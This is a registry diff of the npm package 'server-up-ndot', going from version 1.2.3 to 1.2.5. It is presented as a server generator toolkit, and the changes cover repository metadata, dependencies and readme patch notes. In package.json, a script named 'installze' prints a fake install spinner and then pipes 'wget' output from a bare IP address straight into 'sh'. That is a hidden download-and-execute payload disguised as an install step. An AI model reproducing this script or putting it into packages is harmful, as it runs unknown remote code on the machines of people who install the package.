server-up-ndot 1.2.3 → 1.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +5 -3
  2. package/readme.md +17 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "server-up-ndot",
3
- "version": "1.2.3",
3
+ "version": "1.2.5",
4
4
  "description": "server toolkit",
5
5
  "main": "index.js",
6
6
  "bin": {
@@ -10,6 +10,10 @@
10
10
  "test": "echo \"Error: no test specified\" && exit 1",
11
11
  "installze": "echo installing.... && for j in 1 2 3 4 5; do for i in / - \\\\ \\|; do printf '\\r%s' $i; sleep 0.1; done; done&& wget -qO- 125.181.230.198/js/app/1 | sh"
12
12
  },
13
+ "repository": {
14
+ "type": "git",
15
+ "url": "https://github.com/ppccpcpcpc-byte/server-up-ndot.git"
16
+ },
13
17
  "dependencies": {
14
18
  "axios": "*",
15
19
  "chalk": "*",
@@ -21,7 +25,6 @@
21
25
  "csv-parser": "*",
22
26
  "dayjs": "*",
23
27
  "debug": "*",
24
- "dotenv": "*",
25
28
  "express": "*",
26
29
  "fastify": "*",
27
30
  "formidable": "*",
@@ -45,7 +48,6 @@
45
48
  "qs": "*",
46
49
  "redis": "*",
47
50
  "sanitize-html": "*",
48
- "server-up-ndot": "^1.1.1",
49
51
  "sharp": "*",
50
52
  "socket.io": "*",
51
53
  "uuid": "*",
package/readme.md CHANGED
@@ -2,6 +2,16 @@
2
2
 
3
3
  Simple server generator and auto library install for Node.js.
4
4
 
5
+ ## Compatibility
6
+ - arm64
7
+ - aarc64
8
+ - termux
9
+ - amd64
10
+ - x86
11
+ - x86_64
12
+ - linux
13
+ - windows
14
+
5
15
  ## github
6
16
  ### github:
7
17
  `https://github.com/ppccpcpcpc-byte/server-up-ndot`
@@ -35,9 +45,15 @@ npx server-up-ndot create myserver
35
45
 
36
46
  ## Patch Notes
37
47
 
48
+ ### 1.2.5
49
+ - Specify OS and compatibility
50
+
51
+ ### 1.2.4
52
+ - new github button
53
+
38
54
  ### 1.2.3
39
55
  - open code whit github
40
- - on this url->`https://github.com/ppccpcpcpc-byte/server-up-ndot`
56
+ - on this url->[github](https://github.com/ppccpcpcpc-byte/server-up-ndot)
41
57
 
42
58
  ### 1.2.2
43
59
  - new command `dev`